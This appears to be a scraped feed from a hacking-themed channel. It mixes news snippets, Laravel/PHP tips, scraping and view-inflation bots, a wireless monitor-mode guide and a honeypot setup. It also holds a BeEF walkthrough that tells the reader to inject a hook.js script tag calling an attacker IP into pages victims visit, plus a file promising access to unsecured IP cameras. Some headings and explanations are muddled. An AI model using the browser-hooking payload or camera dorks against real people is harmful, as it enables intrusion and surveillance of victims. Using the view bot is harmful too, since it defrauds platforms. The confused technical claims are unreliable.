Forwarded from UNDERCODE NEWS
On the morning of 28 August, Xiaomi Group's share price rose more than 10.7 percent, to 23.65.
#international
■ ■ ■ UNDERCODE ■ ■ ■
🦑 HACK WITH BeEF (KALI / PARROT)
1) The BeEF Framework
A Linux OS such as Kali Linux, Parrot OS, BlackArch, BackBox, or Cyborg OS is required to install BeEF on your local machine.
Although BeEF comes pre-installed on various pen-testing distributions, it may not be installed in your case. To check whether BeEF is installed, look for it in your Kali Linux menu: Applications > Kali Linux > System Services > beef start.
2) Alternatively, you can fire up BeEF from a new terminal by entering the following commands:
$ cd /usr/share/beef-xss
$ sudo ./beef
3) To install BeEF on your Kali Linux machine, open a terminal and run the following commands:
$ sudo apt-get update
$ sudo apt-get install beef-xss
4) BeEF should now be installed under /usr/share/beef-xss.
You can start using BeEF at the address given below.
» Welcome to BeEF
5) Now you can see the BeEF GUI in its full glory. Access the BeEF server by launching your web browser and browsing to localhost (127.0.0.1).
6) You can access the BeEF web GUI by typing the following URL in your web browser:
http://localhost:3000/ui/authentication
7) The default credentials are username "beef" and password "beef".
8) Now that you have logged into the BeEF web GUI, proceed to the "Hooked Browsers" panel, which is divided into Online Browsers and Offline Browsers. This section shows each victim's hook status.
Using BeEF
This walkthrough will demonstrate how to use BeEF in your local network using the localhost.
9) For connections from outside the network, we would need to open ports and forward them to the waiting clients. In this article we will stick to our home network; port forwarding will be covered in future articles.
10) Hooking a Browser
To get to the core of what BeEF is about, you first need to understand what a BeEF hook is: a JavaScript file used to latch onto a target's browser, exploiting it while acting as a command-and-control channel between it and the attacker. This is what "hook" means in the context of BeEF. Once a web browser is hooked, you can inject further payloads and begin post-exploitation.
To find your local IP address, open a new terminal and enter the following:
$ sudo ifconfig
Follow the steps below to perform the attack:
11) To target a web browser, first identify a web page the intended victim visits often, then attach a BeEF hook to it.
Deliver the JavaScript payload, preferably by including the JavaScript hook in the web page's header. The target browser becomes hooked once it visits this page.
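As a sketch, the hook is delivered as a single script tag pointing at the BeEF server's hook.js; the IP address below is a placeholder, substitute the address reported by ifconfig:

```html
<!-- Hypothetical injection point: inside the target page's <head>. -->
<!-- Loads BeEF's hook script from the attacker's machine (placeholder IP). -->
<script src="http://192.168.1.10:3000/hook.js" type="text/javascript"></script>
```

Once this script loads in the target browser, the browser appears under "Hooked Browsers" in the BeEF GUI.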
If you have been able to follow these steps without any problems, you should be able to see the hooked IP address and OS platform in the BeEF GUI. You can find out more about the compromised system by clicking on the hooked browser listed in the window.
Also, several generic web-page templates are made available for your use, for example:
http://localhost:3000/demos/butcher/index.html
Powered by wiki (verified)
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
■ ■ ■ UNDERCODE ■ ■ ■
■ ■ ■ UNDERCODE ■ ■ ■
🦑 #fasttips Changing Your Authentication Model:
» Problem
You need to change the authentication model from the default User: your application uses namespaces, or you want a differently named model for users.
» Solution
Edit app/config/auth.php to change the model.
'model' => 'MyApp\Models\User',
Discussion
Don't forget the required interfaces.
🦑 If you're using your own model, it must implement Auth's UserInterface. If you're implementing the password-reminder feature, it should also implement RemindableInterface.
<?php namespace MyApp\Models;

use Illuminate\Auth\UserInterface;
use Illuminate\Auth\Reminders\RemindableInterface;

class User extends \Eloquent implements UserInterface, RemindableInterface
{
    // ...
}
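As a hedged sketch, the methods those interfaces require in Laravel 4.0 look roughly like this; the password and email property names are assumptions, adapt them to your schema:

```php
<?php namespace MyApp\Models;

use Illuminate\Auth\UserInterface;
use Illuminate\Auth\Reminders\RemindableInterface;

class User extends \Eloquent implements UserInterface, RemindableInterface
{
    // UserInterface: the unique identifier Auth stores in the session
    public function getAuthIdentifier()
    {
        return $this->getKey();
    }

    // UserInterface: the hashed password Auth checks on login
    public function getAuthPassword()
    {
        return $this->password;
    }

    // RemindableInterface: the address password reminders are sent to
    public function getReminderEmail()
    {
        return $this->email;
    }
}
```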
■ ■ ■ UNDERCODE ■ ■ ■
Forwarded from UNDERCODE NEWS
Why would a "supermarket" buy TikTok, and why are legacy brands also moving into social e-commerce? #international
■ ■ ■ UNDERCODE ■ ■ ■
🦑 2020 method: get Instagram posts/profile/hashtag data without the Instagram API (crawler.py); like posts automatically (liker.py)
INSTALLATION & RUN :
1) Make sure you have the Chrome browser installed.
2) Download chromedriver and put it into the bin folder: ./inscrawler/bin/chromedriver
> https://sites.google.com/a/chromium.org/chromedriver/
3) Install the dependencies (including Selenium): pip3 install -r requirements.txt
4) cp inscrawler/secret.py.dist inscrawler/secret.py
E X A M P L E S :
python crawler.py posts_full -u cal_foodie -n 100 -o ./output
python crawler.py posts_full -u cal_foodie -n 10 --fetch_likers --fetch_likes_plays
python crawler.py posts_full -u cal_foodie -n 10 --fetch_comments
python crawler.py profile -u cal_foodie -o ./output
python crawler.py hashtag -t taiwan -o ./output
python crawler.py hashtag -t taiwan -o ./output --fetch_details
python crawler.py posts -u cal_foodie -n 100 -o ./output # deprecated
🦑 MORE USAGE :
1) With mode posts you get the url, caption, and first photo of each post; with mode posts_full you also get all photos, time, comments, and the number of likes and views per post. Mode posts_full takes far longer than posts. (posts is deprecated: for recent posts there is no quick way to get the caption.)
2) Returns 100 hashtag posts (mode: hashtag) and all of a user's posts (mode: posts) by default, if the number of posts is not specified with -n, --number.
3) Prints the result to the console if the output path is not specified with -o, --output.
4) Fetching much more than about 1,000 posts takes far longer, since Instagram rate-limits data requests.
5) Don't use this crawler on accounts with more than 10,000 posts.
enjoy ❤️👍🏻
Source: git, 2020
■ ■ ■ UNDERCODE ■ ■ ■
Forwarded from UNDERCODE NEWS
US 5G network speed lags behind the world: the average downlink is only 50.9 Mb/s.
#technologie
■ ■ ■ UNDERCODE ■ ■ ■
🦑 youtube-bot topic, 2020 (views):
INSTALLATION & RUN :
Run the following commands in the terminal:
1) curl -fs https://gitlab.com/DeBos/mpt/raw/master/mpt.sh | sh -s install "git python"
2) git clone https://gitlab.com/DeBos/ytviewer.git
3) cd ytviewer
4) make
Then run the following command in the command prompt or the terminal:
5) python main.py [-h] [-u URL|FILE] [-p N] [-B firefox|chrome] [-P FILE] [-R REFERER|FILE] [-U USER_AGENT|FILE]
For more usage, visit https://github.com/DeBos99/ytviewer#usage
enjoy ❤️👍🏻
Source: git, 2020
■ ■ ■ UNDERCODE ■ ■ ■
■ ■ ■ UNDERCODE ■ ■ ■
🦑 #Fasttips Finding Files Matching a Pattern:
Use the File::glob() method.
$log_files = File::glob('/test/*.log');
if ($log_files === false)
{
die("An error occurred.");
}
You can also pass flags to the method.
$dir_list = File::glob('/test/*', GLOB_ONLYDIR);
if ($dir_list === false)
{
    die("An error occurred.");
}
Valid flags are:
GLOB_MARK - Adds a slash to each directory returned
GLOB_NOSORT - Returns files as they appear in the directory (no sorting)
GLOB_NOCHECK - Returns the search pattern if no files matched it
GLOB_NOESCAPE - Backslashes do not quote metacharacters
GLOB_BRACE - Expands {a,b,c} to match 'a', 'b', or 'c'
GLOB_ONLYDIR - Returns only directory entries matching the pattern
GLOB_ERR - Stops on read errors (such as unreadable directories); by default errors are ignored
The method returns an empty array if no files match, or false on error.
■ ■ ■ UNDERCODE ■ ■ ■
■ ■ ■ UNDERCODE ■ ■ ■
🦑 Crawl and Analyze a File:
Crawling and analyzing a file is very simple. This tutorial will lead you step by step through an example. Let's start!
1) First of all, we must decide the URL we will crawl. It can be set in the script or passed through $QUERY_STRING. For simplicity, let's set the variable directly in the script.
<?
$url = 'http://www.php.net';
?>
In the second step, we grab the specified file and store it in an array using the file() function.
<?
$url = 'http://www.php.net';
$lines_array = file($url);
?>
2) Okay, now the file is in the array. However, the text we want to analyze may not all be on one line, so we simply convert the array $lines_array into a string using the implode(x, y) function. If you plan to use explode() on the string later, it may be better to set x to "|", "!", or some other separator, but for our purposes it is best to set x to a space. y is the other required parameter: the array you want implode() to join.
<?
$url = 'http://www.php.net';
$lines_array = file($url);
$lines_string = implode(' ', $lines_array);
?>
3) Now the crawling work is finished, and it's time to analyze. For this example, we want to get everything between <head> and </head>. To analyze the string, we also need something called a regular expression.
<?
$url = 'http://www.php.net';
$lines_array = file($url);
$lines_string = implode(' ', $lines_array);
eregi("<head>(.*)</head>", $lines_string, $head);
?>
4) Let's take a look at the code. As you can see, the eregi() function is called in the following format:
eregi("<head>(.*)</head>", $lines_string, $head);
"(.*)" matches everything, so this reads as "capture everything between <head> and </head>". $lines_string is the string we are analyzing, and $head is the array where the match is stored. (Note that eregi() was removed in PHP 7; in modern code use preg_match() with the /i modifier.)
5) Finally, we can output the data. Because there is only one <head>...</head> pair, we can safely assume the array holds a single match, and it is what we want. Let's print it out.
<?
$url = 'http://www.php.net';
$lines_array = file($url);
$lines_string = implode(' ', $lines_array);
eregi("<head>(.*)</head>", $lines_string, $head);
echo $head[0];
?>
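Since eregi() no longer exists in modern PHP, the same step can be sketched with preg_match(); the /i and /s modifiers keep the match case-insensitive and let .* span newlines. The sample HTML string below is a stand-in for the fetched page:

```php
<?php
// Offline stand-in for the page fetched with file() above.
$lines_string = '<html><HEAD><title>Example</title></HEAD><body>...</body></html>';

// Capture everything between <head> and </head>, case-insensitively.
if (preg_match('/<head>(.*)<\/head>/is', $lines_string, $head)) {
    echo $head[1]; // inner content; $head[0] is the full match including tags
}
?>
```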
6) This is all the code:
<?php
$url = 'http://www.php.net';
$lines_array = file($url);
$lines_string = implode(' ', $lines_array);
preg_match_all("/<body([^>]*)>(.*)<\/body>/is", $lines_string, $m);
echo "<xmp>";
echo $m[2][0];
?>
■ ■ ■ UNDERCODE ■ ■ ■
Using Powershell to programmatically run nmap scans.pdf
252 KB
The resulting script could only be described as a quick hack: about ten lines of PowerShell to read a text file and iterate over each line, running the required nmap command and checking to make sure that the XML file actually saved.
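The PDF itself is not reproduced here, but a script matching that description might look roughly like this; the file names and nmap flags are assumptions, not taken from the paper:

```powershell
# Read one target per line and run nmap against each, saving XML output.
$targets = Get-Content -Path .\targets.txt
foreach ($target in $targets) {
    $outFile = ".\scans\$target.xml"
    & nmap -sV -oX $outFile $target
    # Check that the XML file actually saved before moving on.
    if (-not (Test-Path $outFile)) {
        Write-Warning "No XML output for $target"
    }
}
```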
■ ■ ■ UNDERCODE ■ ■ ■
🦑 FULL AIRMON-NG TUTORIAL
(KALI / PARROT / UBUNTU ...)
Putting wireless cards into monitor mode:
For this purpose, we will use the POSIX sh script designed specifically to carry out this function:
$ sudo airmon-ng --help
usage: airmon-ng <start|stop|check> <interface> [channel or frequency]
See the interface's status
To view the interface's status, type the following command into the terminal:
$ sudo airmon-ng
Kill background processes
Use the following syntax to check whether any interfering program is running in the background:
$ sudo airmon-ng check
You can also terminate any process that you think is interfering with airmon-ng or taking up memory, using:
$ sudo airmon-ng check kill
How to enable monitor mode using airmon-ng
If you have tried enabling monitor mode using iw and failed, it is a good idea to try a different method.
The first step is to get the information about your wireless interface
$ sudo airmon-ng
Of course, you will want to kill any process that can interfere with using the adapter in monitor mode. To do that, run:
$ sudo airmon-ng check
$ sudo airmon-ng check kill
Now we can enable monitor mode without any interference.
$ sudo airmon-ng start wlan0
A new monitor interface, wlan0mon, is created. Verify it with:
$ sudo iwconfig
Now, you can use the following commands to disable the monitor mode and return to the managed mode.
$ sudo airmon-ng stop wlan0mon
Then restart the network manager:
$ sudo systemctl start NetworkManager
How to turn off the NetworkManager that can prevent monitor mode:
$ sudo systemctl stop NetworkManager
■ ■ ■ UNDERCODE ■ ■ ■
■ ■ ■ UNDERCODE ■ ■ ■
🦑 #requested How to Add a New Column to an Existing Table in a Migration?
I've had a problem: I couldn't add a new column to my users table, and I can't seem to figure it out.
I tried to edit the migration file using…
<?php
public function up()
{
Schema::create('users', function ($table) {
$table->integer("paid");
});
}
In the terminal, I execute php artisan migrate:install and migrate.
🦑 How do I add new columns?
Solution:
You cannot update any migrations that have already been run; if a migration is already recorded in the migrations table, it won't be processed again. The solution is to create a new migration, using the make:migration command on the Artisan CLI. Use a specific name to avoid clashing with existing models.
1) for Laravel 5+:
php artisan make:migration add_paid_to_users_table --table=users
You will be using the Schema::table() method (since you're altering an existing table, not creating a new one). You can add the column like this:
public function up()
{
Schema::table('users', function($table) {
$table->integer('paid');
});
}
2) and donβt forget to add the rollback option:
public function down()
{
Schema::table('users', function($table) {
$table->dropColumn('paid');
});
}
3) Then you can run your migrations:
> php artisan migrate
■ ■ ■ UNDERCODE ■ ■ ■
Gain access to unsecured IP cameras with these Google dorks.txt
1.4 KB
■ ■ ■ UNDERCODE ■ ■ ■
🦑 TwitterBOT:
INSTALLATION
Connecting to Twitter:
1) Register a Twitter account and get its "app info".
Twitter doesn't allow you to register multiple accounts on the same email address, so I recommend creating a brand-new email address (perhaps with Gmail) for the bot's account. Once you register the account, wait for the confirmation email.
2) Now go to the Twitter apps page and log in as the Twitter account for your bot.
3) Fill in the form and submit. Once the submission completes, you will be taken to a page with the app's settings tabs; update the details there:
"Permissions" tab: enable Read and Write.
"Key and Access Token" tab: click "Create my access token".
4) Use the generated tokens from the "Key and Access Token" tab to fill in the fields of the config.js file in your app directory. It should look like this:
module.exports = {
consumer_key: 'blah',
consumer_secret: 'blah',
access_token: 'blah',
access_token_secret: 'blah'
}
5) Update the code in bot.js with your values; best of all, modify the code and tinker with it.
6) Now type the following in the command line in your project directory:
node bot.js
7) Hopefully at this point you see a message like "Success! Check your bot, it should have retweeted something." OK, it won't say that; you have to code that in. It's as simple as:
console.log("Success! Check your bot, it should have retweeted something.");
8) Check the Twitter account for your bot; it should have retweeted a tweet with the provided hashtag.
RUN :
1) git clone https://github.com/nisrulz/twitterbot-nodejs.git
2) Run
npm install
enjoy ❤️👍🏻
■ ■ ■ UNDERCODE ■ ■ ■
■ ■ ■ UNDERCODE ■ ■ ■
🦑 ZERO-DAY TUTORIAL:
Libemu is a library used for shellcode detection and x86 emulation. Libemu can detect malware inside documents such as RTF and PDF files and flag hostile behavior using heuristics. This is an advanced form of honeypot, and beginners should not try it.
I recommend not running it on a system used for other purposes, as the libraries and code we install may damage other parts of your system. Dionaea is unsafe: if it gets compromised by a hacker, your whole system is compromised. For this reason, a lean install should be used; Debian and Ubuntu systems are preferred.
INSTALLATION & RUN :
Install dependencies:
Dionaea is composite software, and it requires many dependencies that are not installed by default on systems like Ubuntu and Debian. So we have to install the dependencies before installing Dionaea, and it can be a dull task. For example, we need the following packages to begin:
$ sudo apt-get install libudns-dev libglib2.0-dev libssl-dev libcurl4-openssl-dev \
    libreadline-dev libsqlite3-dev python-dev libtool automake autoconf \
    build-essential subversion git-core flex bison pkg-config libnl-3-dev \
    libnl-genl-3-dev libnl-nf-3-dev libnl-route-3-dev sqlite3
A setup script by Andrew Michael Smith can be downloaded from GitHub using wget. When run, it will install applications (SQLite) and dependencies, then download and configure Dionaea:
$ wget -q https://raw.github.com/andremichaelsmith/honeypot-setup-script/master/setup.bash -O /tmp/setup.bash && bash /tmp/setup.bash
7) Choose an interface:
After the dependencies and applications are downloaded, Dionaea will configure itself and ask you to select the network interface you want the honeypot to listen on.
8) Configuring Dionaea:
The honeypot is now set up and running. In future tutorials, I will show how to identify attackers' artifacts, how to set up Dionaea to alert you during a live attack, and how to inspect and capture the attack's shellcode. We will test it with our attack tools and Metasploit to check that we can capture malware before placing it live online.
9) Open the Dionaea configuration file:
Open the Dionaea configuration file in this step.
$ cd /etc/dionaea
10) Vim or any other text editor will work; Leafpad is used in this case.
$ sudo leafpad dionaea.conf
Configure logging:
Log files of multiple gigabytes are common, so log error priorities should be configured. For this purpose, scroll down to the logging section of the file.
11) Services:
Dionaea is set up to run https, http, FTP, TFTP, SMB, epmap, SIP, MSSQL, and MySQL.
Disable http and https, because hackers are unlikely to be fooled by them and they are not vulnerable. Leave the others, since they are unsafe services that hackers can attack easily.
12) Start Dionaea to test:
Run Dionaea with the new configuration by typing:
$ sudo dionaea -u nobody -g nogroup -w /opt/dionaea -p /opt/dionaea/run/dionaea.pid
13) Dionaea is now running successfully, and we can analyze and capture malware with its help.
enjoy ❤️👍🏻
Source: Darkiwiki
■ ■ ■ UNDERCODE ■ ■ ■
■ ■ ■ UNDERCODE ■ ■ ■